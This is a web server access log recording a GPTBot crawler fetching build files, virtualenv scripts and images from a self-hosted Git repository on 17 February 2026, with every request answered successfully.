[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58144] [Gzip 28.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 98899] [Gzip 28.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9891] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 97752] [Gzip 28.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 14238076] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13708] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11623] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" -[17/Feb/2026:15:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16417] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:15:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" -[17/Feb/2026:15:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14884] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10207] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10202] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10433] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10433] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17042] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17039] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11013] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10225] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11898] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr 